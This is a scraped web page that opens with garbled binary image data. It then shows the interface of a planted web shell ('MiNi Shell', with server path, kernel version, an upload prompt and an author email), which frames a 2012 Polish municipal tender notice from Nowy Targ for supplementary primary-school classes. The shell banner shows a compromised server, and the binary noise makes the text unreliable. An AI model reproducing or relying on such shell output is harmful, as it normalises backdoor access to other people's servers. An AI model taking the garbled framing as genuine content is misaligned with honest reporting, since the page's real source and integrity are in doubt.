JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121012/394770-N-2012.html

<p class="kh_header"><b>Nowy Targ: Realizację od lutego 2012r. do maja 2013r. programu zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w  szkołach podstawowych na terenie Miasta Nowy Targ</b><br>
<b>Numer ogłoszenia: 394770 - 2012; data zamieszczenia: 12.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Nowy Targ , ul. Krzywa 1, 34-400 Nowy Targ, woj. małopolskie, tel. 018 2611244, faks 018 2662312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowytarg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizację od lutego 2012r. do maja 2013r. programu zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w  szkołach podstawowych na terenie Miasta Nowy Targ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja od lutego 2012r. do maja 2013r. programu zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Miasta Nowy Targ w ramach Projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w  Nowy Targu, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Projekt obejmuje trzy okresy realizacyjne: 
1) od 1 lutego 2012r. do 31 maja 2012r.,
2) od 1 września 2012r. do 31 grudnia 2012r.,
3) od 1 lutego 2013r. do 31 maja 2013r. 
Przedmiot zamówienia obejmuje drugi i trzeci okres realizacyjny od 1września 2012r. do 31 maja 2013r.
2. Przedmiot zamówienia obejmuje:
1)	Zajęcia dla dzieci z trudnościami w  czytaniu i pisaniu.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	15	8	1	15	8	1	30	8
Maksymalna liczba osób w  grupie - 8

2)	Zajęcia dla dzieci z trudnościami w  zdobywaniu umiejętności matematycznych.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	30	8	1	30	8	2	60	16
Maksymalna liczba osób w  grupie - 8

3)	Zajęcia logopedyczne.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 3	2	30	8	2	30	8	2	60	8
SP Nr 6	2	60	8	2	60	8	4	120	16
Razem:	4	90	16	4	90	16	6	180	24
Maksymalna liczba osób w  grupie - 4

4)	Zajęcia gimnastyka korekcyjna.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	15	5	1	15	5	1	30	5
Maksymalna liczba osób w  grupie - 5

5)	Zajęcia socjoterapeutyczne i psychoedukacyjne.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	15	10	1	15	10	1	30	10
Maksymalna liczba osób w  grupie - 10

6)	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie  nauk matematyczno-przyrodniczych.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	15	8	1	15	8	1	30	8
Maksymalna liczba osób w  grupie - 8

7)	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w   zakresie muzyki.
Szkoła	Rok szkolny 2012/2013
	I semestr  
(IX - XII 2012r.)	II semestr  
(II - V 2013r.)	Ogółem 
(I i II semestr)
	Liczba	Liczba	Liczba
	grup	godzin	dzieci	grup	godzin	dzieci	grup	godzin	dzieci
SP Nr 6	1	15	8	1	15	8	1	30	8
Maksymalna liczba osób w  grupie - 8

Łącznie przedmiot zamówienia obejmuje 7 rodzajów zajęć, w wymiarze 390 godzin zajęć w 13 grupach zajęciowych, jak w przedstawionych powyżej tabelach.

3. Przedmiot zamówienia został podzielony na 13 niżej wymienionych części i będzie realizowany wg przedstawionego powyżej podziału:
1/ część 1 - Zajęcia dla dzieci z trudnościami w  czytaniu i pisaniu w  SP Nr 6 w  Nowym  Targu  1 grupa w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 45 minut;
2/ część 2 - Zajęcia dla dzieci z trudnościami w  zdobywaniu umiejętności matematycznych w  SP Nr 6 w  Nowym  Targu  1 grupa (A) w  okresie I semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 45 minut;
3/ część 3 - Zajęcia dla dzieci z trudnościami w  zdobywaniu umiejętności matematycznych w  SP Nr 6 w  Nowym  Targu  1 grupa (B) w  okresie II semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 45 minut;
4/ część 4 - Zajęcia logopedyczne w  SP Nr 3 w  Nowym  Targu  1 grupa (C) w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 60 minut;
5/ część 5 - Zajęcia logopedyczne w  SP Nr 3 w  Nowym  Targu  1 grupa (D) w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 60 minut;
6/ część 6 - Zajęcia logopedyczne w  SP Nr 6 w  Nowym  Targu  1 grupa (A) w  okresie I semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 60 minut;
7/ część 7 - Zajęcia logopedyczne w  SP Nr 6 w  Nowym  Targu  1 grupa (B) w  okresie I semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 60 minut;
8/ część 8- Zajęcia logopedyczne w  SP Nr 6 w  Nowym  Targu  1 grupa (C) w  okresie II semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 60 minut;
9/ część 9 - Zajęcia logopedyczne w  SP Nr 6 w  Nowym  Targu  1 grupa (D) w  okresie II semestru roku szkolnego 2012/2013 (30h) - ogółem 30h. Czas trwania 1 godziny zajęć - 60 minut;
10/ część 10 - Zajęcia gimnastyki korekcyjnej w  SP Nr 6 w  Nowym  Targu  1 grupa (A) w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 45 minut;
11/ część 11 - Zajęcia socjoterapeutyczne i psychoedukacyjne w  SP Nr 6 w  Nowym  Targu  1 grupa w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 60 minut;
12/ część 12 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w   zakresie  nauk matematyczno-przyrodniczych w  SP Nr 6 w  Nowym  Targu  1 grupa w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć - 45 minut;
13/ część 13 - Zajęcia rozwijające  zainteresowania uczniów szczególnie uzdolnionych w   zakresie muzyki w  SP Nr 6 w  Nowym  Targu  1 grupa w  okresie roku szkolnego 2012/2013 (I semestr - 15h, II semestr - 15h). Ogółem w  roku szkolnym 2012/2013 - 30h. Czas trwania 1 godziny zajęć -45 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50, poz. 400).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, przy realizacji niniejszego zamówienia osoby posiadające kwalifikacje do nauczania w szkole podstawowej zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50, poz. 400): 
a) dla części postępowań - zajęcia dla dzieci z trudnościami w czytaniu i pisaniu - kwalifikacje w zakresie pedagogiki wczesnoszkolnej, 
b) dla części postępowań - zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - kwalifikacje w zakresie pedagogiki wczesnoszkolnej, 
c) dla części postępowań - zajęcia logopedyczne - kwalifikacje w zakresie logopedii,
d) dla części postępowań - zajęcia gimnastyki korekcyjnej - kwalifikacje do prowadzenia gimnastyki korekcyjnej,
e) dla części postępowań - zajęcia socjoterapeutyczne i psychoedukacyjne - kwalifikacje w zakresie pedagogiki specjalnej, psychologii, terapii pedagogicznej,
f) dla części postępowań - zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk matematyczno-przyrodniczych - kwalifikacje w zakresie pedagogiki wczesnoszkolnej, 
g) dla części postępowań - zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie muzyki - kwalifikacje w zakresie pedagogiki wczesnoszkolnej, 
Wykonawcy muszą wykazać także minimum 3 lata doświadczenia w pracy z dziećmi szkół podstawowych po uzyskaniu kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wykonawców działających przez pełnomocnika - pełnomocnictwo, o którym mowa w Rozdziale XVII ust. 6 pkt 3 SIWZ, oraz inny dokument potwierdzający umocowanie do podpisania oferty umożliwiający identyfikację i zgodność podpisu na ofercie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
1/ zmiany kluczowych specjalistów przedstawionych w umowie - na wniosek zamawiającego lub wykonawcy w postaci pisemnej zgody,
2/ aktualizację danych wykonawcy i zamawiającego,
3/ zmianę terminów realizacji zamówienia z przyczyn niezależnych od wykonawcy lub zamawiającego, które to przyczyny każda ze stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca i że zamawiający nie straci dofinansowania,  
4/ jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
5/ ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z wykonawcą do postanowień umowy o dofinansowanie,
6/ zmiany harmonogramu realizacji zadania
3. Warunki dokonywania zmian: 
1/ inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
2/ uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3/ zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. 2010r. Nr 113, poz. 759 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu w  części wykraczającej poza określenie przedmiotu zamówienia zawarte w  SIWZ, 
4/ forma pisemna pod rygorem nieważności w  formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowytarg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Nowy Targ 
ul. Krzywa 1
34-400 Nowy Targ 
pok.221 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2012 godzina 09:30, miejsce: Urząd Miasta Nowy Targ 
ul. Krzywa 1
34-400 Nowy Targ 
Sekretariat Burmistrza pok.101 Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia /według załącznika nr 8 do SIWZ/. 2. Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia o których mowa w Rozdziale VII ust. 2 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert. 3. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana według formuły spełnia - nie spełnia. 4. Wykonawcy którzy nie udowodnią nie podlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy będą wykluczeni z udziału w postępowaniu. Z udziału w niniejszym postępowaniu wyklucza się również wykonawców którzy podlegają również wykluczeniu na postawie art. 24 ust. 2 ustawy. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 5. Ocena braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 ustawy dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia, o których mowa w Rozdziale VIII ust. 1 SIWZ. 6. Ocena braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 ustawy zostanie dokonana według formuły spełnia - nie spełnia. 7.Wymagany termin realizacji przedmiotu zamówienia: - rozpoczęcie - od daty podpisania umowy - zakończenie - do 31 maja 2013 r. 8.Projekt jest współfinansowany przez Europejski Fundusz Społeczny i budżet państwa w ramach Priorytetu IX - Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 - wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki. Zadanie realizowane w ramach Projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w Nowy Targu, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com